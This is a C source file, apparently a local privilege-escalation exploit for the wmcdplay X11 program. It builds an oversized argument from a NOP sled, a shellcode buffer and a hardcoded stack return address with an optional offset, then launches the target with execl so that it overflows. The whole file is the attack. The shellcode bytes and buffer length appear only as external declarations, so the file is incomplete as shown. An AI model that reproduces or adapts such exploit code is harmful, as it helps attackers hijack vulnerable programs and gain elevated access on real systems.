
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int boom ;


 scalar_t__ atoi (char*) ;
 int buflen ;
 int execl (char*,char*,char*,char*,char*,char*,int ) ;
 int memset (char*,int,int) ;
 int printf (char*) ;
 char* shell ;
 int strlen (char*) ;

int main(int argc, char **argv)
{
 char *wm[] = {
  "/usr/X11R6/bin/wmcdplay",
  "-f",
  "-display", "0:0",


  0
 };

 char boom[buflen+10];
 int i = 0, j = 0, ret = 0xbffff796;

 memset(boom, 0, sizeof(boom));
 memset(boom, 0x90, buflen);
 if (argc > 1)
  ret += atoi(argv[1]);
 else
  printf("You can also add an offset to the commandline. 40 worked for me on the console.\n");
 for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
  boom[i] = shell[j++];
 *(long*)(&boom[i]) = ret;

 printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer\n"
        "Respect other users privacy!\n");

 execl(wm[0], wm[0], wm[1], boom, wm[2], wm[3], 0);
 return 0;
}
